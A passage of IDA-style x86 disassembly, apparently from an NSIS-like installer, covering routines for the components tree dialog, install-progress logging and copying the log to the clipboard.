push eax
call ds:dword_408124 ; MulDiv
mov edi, eax
loc_4048B4: ; CODE XREF: sub_40463C+247�j
mov [ebp+var_8], 1
loc_4048BB: ; CODE XREF: sub_40463C+262�j
push 5
call sub_40460F
cmp edi, eax
jnb short loc_4048CD
mov [ebp+var_4], 2
loc_4048CD: ; CODE XREF: sub_40463C+288�j
mov ecx, dword_425BC8
xor esi, esi
cmp [ecx+10h], esi
jz short loc_404905
push 0FFFFFFFBh
push 3FFh
call sub_404578
cmp [ebp+var_8], esi
jz short loc_4048F7
push 0FFFFFFFCh
push ebx
mov eax, edi
call sub_404578
jmp short loc_404905
; ---------------------------------------------------------------------------
loc_4048F7: ; CODE XREF: sub_40463C+2AD�j
push offset word_408BBE
push ebx
push [ebp+arg_0]
call sub_405D57 ; SetDlgItemTextA
loc_404905: ; CODE XREF: sub_40463C+29C�j
; sub_40463C+2B9�j
mov eax, [ebp+var_4]
cmp eax, esi
mov dword_426484, eax
jnz short loc_40491B
push 7
call sub_4014C9
mov [ebp+var_4], eax
loc_40491B: ; CODE XREF: sub_40463C+2D3�j
mov eax, [ebp+var_20]
test [eax+14h], ebx
jz short loc_404926
mov [ebp+var_4], esi
loc_404926: ; CODE XREF: sub_40463C+2E5�j
xor eax, eax
cmp [ebp+var_4], esi
setz al
push eax
call sub_403FFA
cmp [ebp+var_4], esi
jnz short loc_404946
cmp dword_420DC4, esi
jnz short loc_404946
call sub_403FD6
loc_404946: ; CODE XREF: sub_40463C+2FB�j
; sub_40463C+303�j
mov dword_420DC4, esi
loc_40494C: ; CODE XREF: sub_40463C+109�j
; sub_40463C+1C1�j
push [ebp+arg_C]
mov eax, [ebp+arg_4]
push [ebp+arg_8]
call sub_40403F
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40463C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404961 proc near ; CODE XREF: sub_4049AD+59�p
; sub_404A94+2D3�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = byte ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
call ds:dword_4081BC ; GetMessagePos
movsx ecx, ax
shr eax, 10h
movsx eax, ax
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push eax
push [ebp+arg_0]
mov [ebp+var_10], ecx
call ds:dword_4081B8 ; ScreenToClient
lea eax, [ebp+var_10]
push eax
push 0
push 1111h
push [ebp+arg_0]
call ds:dword_408278 ; SendMessageA
mov al, [ebp+var_8]
and al, 66h
neg al
sbb eax, eax
and eax, [ebp+var_4]
leave
retn 4
sub_404961 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4049AD proc near ; DATA XREF: sub_404A94+89�o
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 28h
cmp [ebp+arg_4], 102h
push esi
push edi
jnz short loc_4049D9
cmp [ebp+arg_8], 20h
jnz loc_404A75
push 413h
call sub_404024
xor eax, eax
jmp loc_404A8E
; ---------------------------------------------------------------------------
loc_4049D9: ; CODE XREF: sub_4049AD+F�j
or edi, 0FFFFFFFFh
cmp [ebp+arg_4], 2
jnz short loc_4049E8
mov dword_40A03C, edi
loc_4049E8: ; CODE XREF: sub_4049AD+33�j
cmp [ebp+arg_4], 200h
mov esi, 419h
jnz short loc_404A35
push [ebp+arg_0]
call ds:dword_4081C4 ; IsWindowVisible
test eax, eax
jz short loc_404A75
push [ebp+arg_0]
call sub_404961
test eax, eax
mov [ebp+var_24], eax
jz short loc_404A30
lea eax, [ebp+var_28]
push eax
push 0
push 110Ch
push [ebp+arg_0]
mov [ebp+var_28], 4
call ds:dword_408278 ; SendMessageA
mov edi, [ebp+var_4]
loc_404A30: ; CODE XREF: sub_4049AD+63�j
mov [ebp+arg_4], esi
jmp short loc_404A38
; ---------------------------------------------------------------------------
loc_404A35: ; CODE XREF: sub_4049AD+47�j
mov edi, [ebp+arg_C]
loc_404A38: ; CODE XREF: sub_4049AD+86�j
cmp [ebp+arg_4], esi
jnz short loc_404A78
cmp dword_40A03C, edi
jz short loc_404A78
push ebx
mov esi, offset dword_427000
push esi
mov ebx, offset dword_4219D8
push ebx
mov dword_40A03C, edi
call sub_405FFD ; lstrcpy
push edi
push esi
call sub_405F5B
push 6
call sub_4014C9
push ebx
push esi
call sub_405FFD ; lstrcpy
pop ebx
jmp short loc_404A78
; ---------------------------------------------------------------------------
loc_404A75: ; CODE XREF: sub_4049AD+15�j
; sub_4049AD+54�j
mov edi, [ebp+arg_C]
loc_404A78: ; CODE XREF: sub_4049AD+8E�j
; sub_4049AD+96�j ...
push edi
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
push dword_420DC0
call ds:dword_4081C0 ; CallWindowProcA
loc_404A8E: ; CODE XREF: sub_4049AD+27�j
pop edi
pop esi
leave
retn 10h
sub_4049AD endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404A94 proc near ; DATA XREF: .data:0040A02C�o
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_4C = dword ptr -4Ch
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 54h
push ebx
push esi
mov esi, ds:dword_408240
push edi
push 3F9h
push [ebp+arg_0]
call esi ; GetDlgItem
push 408h
push [ebp+arg_0]
mov [ebp+var_8], eax
call esi ; GetDlgItem
mov esi, ds:dword_408278
mov [ebp+var_4], eax
mov eax, dword_426408
mov [ebp+var_18], eax
mov eax, dword_4263E8
add eax, 94h
xor ebx, ebx
cmp [ebp+arg_4], 110h
push 10h
mov [ebp+var_1C], eax
pop edi
jnz loc_404D04
mov eax, [ebp+arg_0]
mov dword_42644C, eax
mov eax, dword_42640C
shl eax, 2
push eax
mov [ebp+var_20], ebx
mov [ebp+var_14], 2
call sub_405DBB
push 6Eh
push dword_4263E4
mov dword_4211D0, eax
call ds:dword_4081C8 ; LoadBitmapA
push offset sub_4049AD
push 0FFFFFFFCh
push [ebp+var_4]
mov [ebp+var_10], eax
call ds:dword_408244 ; SetWindowLongA
push ebx
push 6
push 21h
push edi
push edi
mov dword_420DC0, eax
call ds:dword_408034
push 0FF00FFh
push [ebp+var_10]
mov dword_4211CC, eax
push eax
call ds:dword_40802C
push dword_4211CC
push 2
push 1109h
push [ebp+var_4]
call esi ; SendMessageA
push ebx
push ebx
push 111Ch
push [ebp+var_4]
call esi ; SendMessageA
cmp eax, edi
jge short loc_404B84
push ebx
push edi
push 111Bh
push [ebp+var_4]
call esi ; SendMessageA
loc_404B84: ; CODE XREF: sub_404A94+E2�j
push [ebp+var_10]
call ds:dword_408040 ; DeleteObject
xor edi, edi
loc_404B8F: ; CODE XREF: sub_404A94+130�j
mov eax, [ebp+var_1C]
mov eax, [eax+edi*4]
cmp eax, ebx
jz short loc_404BC0
cmp edi, 20h
jz short loc_404BA1
mov [ebp+var_14], ebx
loc_404BA1: ; CODE XREF: sub_404A94+108�j
push eax
push ebx
call sub_4065B7
push eax
push ebx
push 143h
push [ebp+var_8]
call esi ; SendMessageA
push edi
push eax
push 151h
push [ebp+var_8]
call esi ; SendMessageA
loc_404BC0: ; CODE XREF: sub_404A94+103�j
inc edi
cmp edi, 21h
jl short loc_404B8F
mov eax, [ebp+var_14]
mov edi, [ebp+arg_C]
push dword ptr [edi+eax*4+30h]
push 15h
push [ebp+arg_0]
call sub_403FB4
mov eax, [ebp+var_14]
push dword ptr [edi+eax*4+34h]
push 16h
push [ebp+arg_0]
call sub_403FB4
xor edi, edi
cmp dword_42640C, ebx
mov [ebp+var_C], ebx
jle loc_404CB8
mov eax, [ebp+var_18]
add eax, 8
mov [ebp+var_10], eax
mov ebx, 1100h
loc_404C0A: ; CODE XREF: sub_404A94+217�j
mov edx, [ebp+var_10]
lea eax, [edx+10h]
cmp byte ptr [eax], 0
jz loc_404C9D
mov ecx, [ebp+var_C]
mov [ebp+var_3C], eax
mov eax, [edx]
push 20h
mov [ebp+var_54], ecx
pop ecx
mov edx, eax
and edx, ecx
test al, 2
mov [ebp+var_50], 0FFFF0002h
mov [ebp+var_4C], 0Dh
mov [ebp+var_40], ecx
mov [ebp+var_28], edi
mov [ebp+var_44], edx
jz short loc_404C6C
lea eax, [ebp+var_54]
push eax
push 0
push ebx
push [ebp+var_4]
mov [ebp+var_4C], 4Dh
mov [ebp+var_2C], 1
call esi ; SendMessageA
mov [ebp+var_C], eax
mov [ebp+var_20], 1
jmp short loc_404C94
; ---------------------------------------------------------------------------
loc_404C6C: ; CODE XREF: sub_404A94+1B0�j
mov eax, [ebp+var_10]
test byte ptr [eax], 4
jz short loc_404C88
push [ebp+var_C]
push 3
push 110Ah
push [ebp+var_4]
call esi ; SendMessageA
mov [ebp+var_C], eax
jmp short loc_404C9D
; ---------------------------------------------------------------------------
loc_404C88: ; CODE XREF: sub_404A94+1DE�j
lea eax, [ebp+var_54]
push eax
push 0
push ebx
push [ebp+var_4]
call esi ; SendMessageA
loc_404C94: ; CODE XREF: sub_404A94+1D6�j
mov ecx, dword_4211D0
mov [ecx+edi*4], eax
loc_404C9D: ; CODE XREF: sub_404A94+17F�j
; sub_404A94+1F2�j
add [ebp+var_10], 418h
inc edi
cmp edi, dword_42640C
jl loc_404C0A
xor ebx, ebx
cmp [ebp+var_20], ebx
jnz short loc_404CD2
loc_404CB8: ; CODE XREF: sub_404A94+162�j
push 0FFFFFFF0h
push [ebp+var_4]
call ds:dword_4081A0 ; GetWindowLongA
and eax, 0FFFFFFFBh
push eax
push 0FFFFFFF0h
push [ebp+var_4]
call ds:dword_408244 ; SetWindowLongA
loc_404CD2: ; CODE XREF: sub_404A94+222�j
push ebx
push 6
push 115h
push [ebp+var_4]
call esi ; SendMessageA
cmp [ebp+var_14], ebx
jnz short loc_404CFC
push 5
push [ebp+var_8]
call ds:dword_408228 ; ShowWindow
push [ebp+var_8]
call sub_40400D
jmp loc_40508A
; ---------------------------------------------------------------------------
loc_404CFC: ; CODE XREF: sub_404A94+24E�j
push [ebp+var_4]
call sub_40400D
loc_404D04: ; CODE XREF: sub_404A94+50�j
cmp [ebp+arg_4], 405h
jnz short loc_404D1F
xor edi, edi
inc edi
mov [ebp+arg_8], ebx
mov [ebp+arg_C], edi
mov [ebp+arg_4], 40Fh
jmp short loc_404D22
; ---------------------------------------------------------------------------
loc_404D1F: ; CODE XREF: sub_404A94+277�j
mov edi, [ebp+arg_C]
loc_404D22: ; CODE XREF: sub_404A94+289�j
cmp [ebp+arg_4], 4Eh
mov eax, 413h
jz short loc_404D36
cmp [ebp+arg_4], eax
jnz loc_404E34
loc_404D36: ; CODE XREF: sub_404A94+297�j
cmp [ebp+arg_4], eax
jz short loc_404D48
cmp dword ptr [edi+4], 408h
jnz loc_404E34
loc_404D48: ; CODE XREF: sub_404A94+2A5�j
test byte ptr dword_426444+1, 2
jnz loc_404DF2
cmp [ebp+arg_4], eax
jz short loc_404D6E
cmp dword ptr [edi+8], 0FFFFFFFEh
jnz loc_404DF2
push [ebp+var_4]
call sub_404961
jmp short loc_404D7B
; ---------------------------------------------------------------------------
loc_404D6E: ; CODE XREF: sub_404A94+2C4�j
push ebx
push 9
push 110Ah
push [ebp+var_4]
call esi ; SendMessageA
loc_404D7B: ; CODE XREF: sub_404A94+2D8�j
cmp eax, ebx
mov [ebp+var_44], eax
jz short loc_404DF2
lea eax, [ebp+var_48]
push eax
push ebx
push 110Ch
push [ebp+var_4]
mov [ebp+var_48], 4
call esi ; SendMessageA
test eax, eax
jz short loc_404DF2
mov eax, [ebp+var_24]
mov ecx, [ebp+var_18]
imul eax, 418h
lea ecx, [eax+ecx+8]
mov eax, [ecx]
test al, 10h
jnz short loc_404DF2
test al, 40h
jz short loc_404DC9
xor eax, 80h
test al, al
jns short loc_404DC4
or eax, 1
jmp short loc_404DCC
; ---------------------------------------------------------------------------
loc_404DC4: ; CODE XREF: sub_404A94+329�j
and eax, 0FFFFFFFEh
jmp short loc_404DCC
; ---------------------------------------------------------------------------
loc_404DC9: ; CODE XREF: sub_404A94+320�j
xor eax, 1
loc_404DCC: ; CODE XREF: sub_404A94+32E�j
; sub_404A94+333�j
mov [ecx], eax
push [ebp+var_24]
call sub_40117D
mov eax, dword_426444
xor ecx, ecx
shr eax, 8
inc ecx
not eax
and eax, ecx
mov [ebp+arg_8], ecx
mov [ebp+arg_C], eax
mov [ebp+arg_4], 40Fh
loc_404DF2: ; CODE XREF: sub_404A94+2BB�j
; sub_404A94+2CA�j ...
cmp edi, ebx
jz short loc_404E34
cmp dword ptr [edi+8], 0FFFFFE6Eh
jnz short loc_404E0D
push dword ptr [edi+5Ch]
push ebx
push 419h
push [ebp+var_4]
call esi ; SendMessageA
loc_404E0D: ; CODE XREF: sub_404A94+369�j
cmp dword ptr [edi+8], 0FFFFFE6Ah
jnz short loc_404E34
mov eax, [edi+5Ch]
mov ecx, [ebp+var_18]
imul eax, 418h
cmp dword ptr [edi+0Ch], 2
lea eax, [eax+ecx+8]
jnz short loc_404E31
or dword ptr [eax], 20h
jmp short loc_404E34
; ---------------------------------------------------------------------------
loc_404E31: ; CODE XREF: sub_404A94+396�j
and dword ptr [eax], 0FFFFFFDFh
loc_404E34: ; CODE XREF: sub_404A94+29C�j
; sub_404A94+2AE�j ...
cmp [ebp+arg_4], 111h
jnz short loc_404EAF
cmp word ptr [ebp+arg_8], 3F9h
jnz loc_40508A
mov eax, [ebp+arg_8]
shr eax, 10h
cmp ax, 1
jnz loc_40508A
push ebx
push ebx
push 147h
push [ebp+var_8]
call esi ; SendMessageA
cmp eax, 0FFFFFFFFh
jz loc_40508A
push ebx
push eax
push 150h
push [ebp+var_8]
call esi ; SendMessageA
mov edi, eax
cmp edi, 0FFFFFFFFh
jz short loc_404E89
mov eax, [ebp+var_1C]
cmp [eax+edi*4], ebx
jnz short loc_404E8C
loc_404E89: ; CODE XREF: sub_404A94+3EB�j
push 20h
pop edi
loc_404E8C: ; CODE XREF: sub_404A94+3F3�j
push edi
call sub_4012A8
push edi
push ebx
push 420h
push [ebp+arg_0]
call esi ; SendMessageA
mov [ebp+arg_8], 1
mov [ebp+arg_C], ebx
mov [ebp+arg_4], 40Fh
loc_404EAF: ; CODE XREF: sub_404A94+3A7�j
cmp [ebp+arg_4], 200h
jnz short loc_404EC4
push ebx
push ebx
push 200h
push [ebp+var_4]
call esi ; SendMessageA
loc_404EC4: ; CODE XREF: sub_404A94+422�j
cmp [ebp+arg_4], 40Bh
jnz short loc_404EFF
mov eax, dword_4211CC
cmp eax, ebx
jz short loc_404EDD
push eax
call ds:dword_408030
loc_404EDD: ; CODE XREF: sub_404A94+440�j
mov eax, dword_4211D0
cmp eax, ebx
jz short loc_404EED
push eax
call ds:dword_40813C ; GlobalFree
loc_404EED: ; CODE XREF: sub_404A94+450�j
mov dword_4211CC, ebx
mov dword_4211D0, ebx
mov dword_42644C, ebx
loc_404EFF: ; CODE XREF: sub_404A94+437�j
cmp [ebp+arg_4], 40Fh
jnz loc_40504C
call sub_40129E
cmp [ebp+arg_8], ebx
jz short loc_404F1D
push 8
call sub_4014C9
loc_404F1D: ; CODE XREF: sub_404A94+480�j
cmp [ebp+arg_C], ebx
jz short loc_404F61
push dword_4211D0
call sub_4012F3
mov edi, eax
push edi
call sub_4012A8
xor eax, eax
xor ecx, ecx
cmp edi, ebx
jle short loc_404F4B
loc_404F3D: ; CODE XREF: sub_404A94+4B5�j
mov edx, [ebp+var_1C]
cmp [edx+eax*4], ebx
jz short loc_404F46
inc ecx
loc_404F46: ; CODE XREF: sub_404A94+4AF�j
inc eax
cmp eax, edi
jl short loc_404F3D
loc_404F4B: ; CODE XREF: sub_404A94+4A7�j
push ebx
push ecx
push 14Eh
push [ebp+var_8]
call esi ; SendMessageA
mov [ebp+arg_C], edi
mov [ebp+arg_4], 420h
loc_404F61: ; CODE XREF: sub_404A94+48C�j
call sub_40129E
cmp dword_42640C, ebx
mov eax, dword_4211D0
mov edi, dword_426408
mov [ebp+var_20], eax
mov [ebp+var_3C], 0F030h
mov [ebp+var_14], ebx
jle loc_40502F
add edi, 8
loc_404F8D: ; CODE XREF: sub_404A94+595�j
mov eax, [ebp+var_20]
mov ecx, [ebp+var_14]
mov eax, [eax+ecx*4]
cmp eax, ebx
jz short loc_405017
mov edx, [edi]
push 8
mov [ebp+var_44], eax
pop eax
mov ecx, edx
and ecx, eax
mov [ebp+var_18], edx
and [ebp+var_18], 20h
shl ecx, 1
or ecx, [ebp+var_18]
test dh, 1
mov [ebp+var_48], eax
mov [ebp+var_40], ecx
jz short loc_404FD1
lea eax, [edi+10h]
mov [ebp+var_48], 9
mov [ebp+var_38], eax
and byte ptr [edi+1], 0FEh
mov ecx, [ebp+var_40]
loc_404FD1: ; CODE XREF: sub_404A94+527�j
test dl, 40h
jz short loc_404FDB
push 3
pop eax
jmp short loc_404FE9
; ---------------------------------------------------------------------------
loc_404FDB: ; CODE XREF: sub_404A94+540�j
mov eax, edx
and eax, 1
inc eax
test dl, 10h
jz short loc_404FE9
add eax, 3
loc_404FE9: ; CODE XREF: sub_404A94+545�j
; sub_404A94+550�j
push [ebp+var_44]
shl eax, 0Ch
or ecx, eax
xor eax, eax
cmp [ebp+var_18], ebx
mov [ebp+var_40], ecx
setnz al
inc eax
push eax
push 1102h
push [ebp+var_4]
call esi ; SendMessageA
lea eax, [ebp+var_48]
push eax
push ebx
push 110Dh
push [ebp+var_4]
call esi ; SendMessageA
loc_405017: ; CODE XREF: sub_404A94+504�j
inc [ebp+var_14]
mov eax, [ebp+var_14]
add edi, 418h
cmp eax, dword_42640C
jl loc_404F8D
loc_40502F: ; CODE XREF: sub_404A94+4F0�j
mov eax, dword_425BC8
cmp [eax+10h], ebx
jz short loc_40504C
push 5
call sub_40460F
push 0FFFFFFFBh
push 3FFh
call sub_404578
loc_40504C: ; CODE XREF: sub_404A94+472�j
; sub_404A94+5A3�j
cmp [ebp+arg_4], 420h
jnz short loc_40508A
test byte ptr dword_426444+1, 1
jz short loc_40508A
mov esi, ds:dword_408228
xor eax, eax
cmp [ebp+arg_C], 20h
setz al
shl eax, 3
mov edi, eax
push edi
push [ebp+var_4]
call esi ; ShowWindow
push edi
push 3FEh
push [ebp+arg_0]
call ds:dword_408240 ; GetDlgItem
push eax
call esi ; ShowWindow
loc_40508A: ; CODE XREF: sub_404A94+263�j
; sub_404A94+3AF�j ...
push [ebp+arg_C]
mov eax, [ebp+arg_4]
push [ebp+arg_8]
call sub_40403F
pop edi
pop esi
pop ebx
leave
retn 10h
sub_404A94 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40509F proc near ; CODE XREF: sub_4014E1+9�p
; sub_401610:loc_40169F�p ...
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_1C = dword ptr -1Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 30h
mov eax, dword_425BAC
push edi
xor edi, edi
cmp eax, edi
mov [ebp+var_8], eax
jz loc_405172
push ebx
mov ebx, dword_40A040
mov [ebp+var_4], ebx
and [ebp+var_4], 1
push esi
mov esi, offset byte_4211D8
jnz short loc_4050D7
push [ebp+arg_0]
push esi
call sub_4065B7
loc_4050D7: ; CODE XREF: sub_40509F+2D�j
push esi
call sub_406003 ; lstrlen
cmp [ebp+arg_4], edi
mov [ebp+arg_0], eax
jz short loc_405101
push [ebp+arg_4]
call sub_406003 ; lstrlen
add eax, [ebp+arg_0]
cmp eax, 800h
jnb short loc_405170
push [ebp+arg_4]
push esi
call ds:dword_4080A4 ; lstrcat
loc_405101: ; CODE XREF: sub_40509F+44�j
test bl, 4
jz short loc_405113
push esi
push dword_425BB8
call ds:dword_408184 ; SetWindowTextA
loc_405113: ; CODE XREF: sub_40509F+65�j
test bl, 2
jz short loc_405161
push edi
push edi
push 1004h
push [ebp+var_8]
mov [ebp+var_1C], esi
mov esi, ds:dword_408278
mov [ebp+var_30], 1
call esi ; SendMessageA
sub eax, [ebp+var_4]
not ebx
mov [ebp+var_2C], eax
lea eax, [ebp+var_30]
push eax
push edi
and ebx, 1
or ebx, 1006h
push ebx
push [ebp+var_8]
mov [ebp+var_28], edi
call esi ; SendMessageA
push edi
push [ebp+var_2C]
push 1013h
push [ebp+var_8]
call esi ; SendMessageA
loc_405161: ; CODE XREF: sub_40509F+77�j
cmp [ebp+var_4], edi
jz short loc_405170
mov eax, [ebp+arg_0]
mov byte_4211D8[eax], 0
loc_405170: ; CODE XREF: sub_40509F+56�j
; sub_40509F+C5�j
pop esi
pop ebx
loc_405172: ; CODE XREF: sub_40509F+13�j
pop edi
leave
retn 8
sub_40509F endp
; =============== S U B R O U T I N E =======================================
sub_405177 proc near ; CODE XREF: sub_405A5A+24B�p
; DATA XREF: sub_405202+1D9�o
arg_0 = dword ptr 4
push esi
mov esi, dword_426408
push edi
mov edi, dword_42640C
push 0
call ds:dword_408294
or dword_426490, eax
test edi, edi
jz short loc_4051E8
add esi, 18h
loc_40519A: ; CODE XREF: sub_405177+67�j
dec edi
test byte ptr [esi-10h], 1
jnz short loc_4051B9
test byte ptr dword_426444+1, 4
jnz short loc_4051B9
push esi
push offset aSkippingSectio ; "Skipping section: \"%s\""
call sub_40614C
pop ecx
pop ecx
jmp short loc_4051D6
; ---------------------------------------------------------------------------
loc_4051B9: ; CODE XREF: sub_405177+28�j
; sub_405177+31�j
push esi
push offset aSectionS ; "Section: \"%s\""
call sub_40614C
pop ecx
pop ecx
push [esp+8+arg_0]
push dword ptr [esi-0Ch]
call sub_4013E7
test eax, eax
jnz short loc_4051E2
loc_4051D6: ; CODE XREF: sub_405177+40�j
add esi, 418h
test edi, edi
jnz short loc_40519A
jmp short loc_4051E8
; ---------------------------------------------------------------------------
loc_4051E2: ; CODE XREF: sub_405177+5D�j
inc dword_42646C
loc_4051E8: ; CODE XREF: sub_405177+1E�j
; sub_405177+69�j
push 404h
call sub_404024
call ds:dword_408290
mov eax, dword_42646C
pop edi
pop esi
retn 4
sub_405177 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_405202 proc near ; DATA XREF: .data:0040A034�o
var_3C = byte ptr -3Ch
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 3Ch
push ebx
push esi
mov esi, dword_425BAC
xor ebx, ebx
cmp [ebp+arg_4], 110h
push edi
mov [ebp+var_4], esi
jnz loc_4053BE
or [ebp+var_2C], 0FFFFFFFFh
or [ebp+var_20], 0FFFFFFFFh
mov [ebp+var_34], 2
mov [ebp+var_30], ebx
mov [ebp+var_28], ebx
mov [ebp+var_24], ebx
xor eax, eax
lea edi, [ebp+var_1C]
stosd
stosd
mov eax, dword_4263E8
mov ecx, [eax+5Ch]
mov eax, [eax+60h]
mov edi, ds:dword_408240
push 403h
push [ebp+arg_0]
mov [ebp+arg_4], ecx
mov [ebp+arg_8], eax
call edi ; GetDlgItem
push 3EEh
push [ebp+arg_0]
mov dword_425BC0, eax
call edi ; GetDlgItem
push 3F8h
push [ebp+arg_0]
mov dword_425BB8, eax
call edi ; GetDlgItem
push dword_425BC0
mov dword_425BAC, eax
mov [ebp+var_4], eax
call sub_40400D
push 4
call sub_40460F
push offset byte_42C400
push 0FFFFFFFDh
push ebx
mov dword_425BC4, eax
mov dword_425BCC, ebx
call sub_4065B7
push eax
push offset aNewInstallOfST ; "New install of \"%s\" to \"%s\""
call sub_40614C
add esp, 0Ch
lea eax, [ebp+var_14]
push eax
push [ebp+var_4]
call ds:dword_408268 ; GetClientRect
push 15h
call ds:dword_4081EC ; GetSystemMetrics
mov ecx, [ebp+var_C]
mov esi, ds:dword_408278
sub ecx, eax
lea eax, [ebp+var_34]
push eax
push ebx
push 101Bh
push [ebp+var_4]
mov [ebp+var_2C], ecx
call esi ; SendMessageA
mov eax, 4000h
push eax
push eax
push 1036h
push [ebp+var_4]
call esi ; SendMessageA
cmp [ebp+arg_4], ebx
jl short loc_405325
push [ebp+arg_4]
push ebx
push 1001h
push [ebp+var_4]
call esi ; SendMessageA
push [ebp+arg_4]
push ebx
push 1026h
push [ebp+var_4]
call esi ; SendMessageA
loc_405325: ; CODE XREF: sub_405202+105�j
cmp [ebp+arg_8], ebx
jl short loc_405338
push [ebp+arg_8]
push ebx
push 1024h
push [ebp+var_4]
call esi ; SendMessageA
loc_405338: ; CODE XREF: sub_405202+126�j
mov eax, [ebp+arg_C]
push dword ptr [eax+30h]
push 1Bh
push [ebp+arg_0]
call sub_403FB4
test byte ptr dword_426444, 3
jz short loc_40537A
push ebx
push dword_425BC0
call ds:dword_408228 ; ShowWindow
test byte ptr dword_426444, 2
jnz short loc_405374
push 8
push [ebp+var_4]
call ds:dword_408228 ; ShowWindow
jmp short loc_40537A
; ---------------------------------------------------------------------------
loc_405374: ; CODE XREF: sub_405202+163�j
mov dword_425BC0, ebx
loc_40537A: ; CODE XREF: sub_405202+14D�j
; sub_405202+170�j
push 3ECh
push [ebp+arg_0]
call edi ; GetDlgItem
push 75300000h
push ebx
mov edi, eax
push 401h
push edi
call esi ; SendMessageA
test byte ptr dword_426444, 4
jz loc_405590
push [ebp+arg_8]
push ebx
push 409h
push edi
call esi ; SendMessageA
push [ebp+arg_4]
push ebx
push 2001h
push edi
call esi ; SendMessageA
jmp loc_405590
; ---------------------------------------------------------------------------
loc_4053BE: ; CODE XREF: sub_405202+1B�j
cmp [ebp+arg_4], 405h
jnz short loc_4053EF
lea eax, [ebp+arg_0]
push eax
push ebx
push 3ECh
push [ebp+arg_0]
call ds:dword_408240 ; GetDlgItem
push eax
push offset sub_405177
push ebx
push ebx
call ds:dword_4080F8 ; CreateThread
push eax
call ds:dword_408084 ; CloseHandle
loc_4053EF: ; CODE XREF: sub_405202+1C3�j
cmp [ebp+arg_4], 111h
mov edi, ds:dword_408228
jnz short loc_405419
cmp word ptr [ebp+arg_8], 403h
jnz short loc_40543B
push ebx
push dword_425BC0
call edi ; ShowWindow
push 8
push esi
call edi ; ShowWindow
call sub_403FD6
loc_405419: ; CODE XREF: sub_405202+1FA�j
cmp [ebp+arg_4], 404h
jnz short loc_405477
cmp dword_425BB4, ebx
jz short loc_405450
push 78h
mov dword_4229E0, 2
call sub_403F8D
loc_40543B: ; CODE XREF: sub_405202+202�j
; sub_405202+279�j ...
push [ebp+arg_C]
mov eax, [ebp+arg_4]
push [ebp+arg_8]
call sub_40403F
loc_405449: ; CODE XREF: sub_405202+390�j
pop edi
pop esi
pop ebx
leave
retn 10h
; ---------------------------------------------------------------------------
loc_405450: ; CODE XREF: sub_405202+226�j
push 8
push dword_4263E0
call edi ; ShowWindow
cmp dword_42646C, ebx
jnz short loc_405470
mov eax, dword_4229DC
push ebx
push dword ptr [eax+34h]
call sub_40509F
loc_405470: ; CODE XREF: sub_405202+25E�j
push 1
call sub_403F8D
loc_405477: ; CODE XREF: sub_405202+21E�j
cmp [ebp+arg_4], 7Bh
jnz short loc_40543B
cmp [ebp+arg_8], esi
jnz short loc_40543B
push ebx
push ebx
push 1004h
push esi
call ds:dword_408278 ; SendMessageA
cmp eax, ebx
mov [ebp+arg_0], eax
jle loc_405590
call ds:dword_4081E8 ; CreatePopupMenu
push 0FFFFFFE1h
push ebx
mov edi, eax
call sub_4065B7
push eax
push 1
push ebx
push edi
call ds:dword_4081E4 ; AppendMenuA
mov eax, [ebp+arg_C]
cmp eax, 0FFFFFFFFh
jnz short loc_4054D1
lea eax, [ebp+var_14]
push eax
push esi
call ds:dword_4081E0 ; GetWindowRect
mov ecx, [ebp+var_14]
mov eax, [ebp+var_10]
jmp short loc_4054DA
; ---------------------------------------------------------------------------
loc_4054D1: ; CODE XREF: sub_405202+2BA�j
movsx ecx, ax
shr eax, 10h
movsx eax, ax
loc_4054DA: ; CODE XREF: sub_405202+2CD�j
push ebx
push esi
push ebx
push eax
push ecx
push 180h
push edi
call ds:dword_4081DC ; TrackPopupMenu
xor edi, edi
inc edi
cmp eax, edi
jnz loc_405590
mov esi, [ebp+arg_0]
mov [ebp+var_34], ebx
mov [ebp+var_28], offset dword_4219D8
mov [ebp+var_24], 0FFFh
loc_40550A: ; CODE XREF: sub_405202+322�j
lea eax, [ebp+var_3C]
push eax
dec esi
push esi
push 102Dh
push [ebp+var_4]
call ds:dword_408278 ; SendMessageA
cmp esi, ebx
lea edi, [edi+eax+2]
jnz short loc_40550A
push ebx
call ds:dword_4081D8 ; OpenClipboard
call ds:dword_4081D4 ; EmptyClipboard
push edi
push 42h
call ds:dword_4080F4 ; GlobalAlloc
push eax
mov [ebp+arg_4], eax
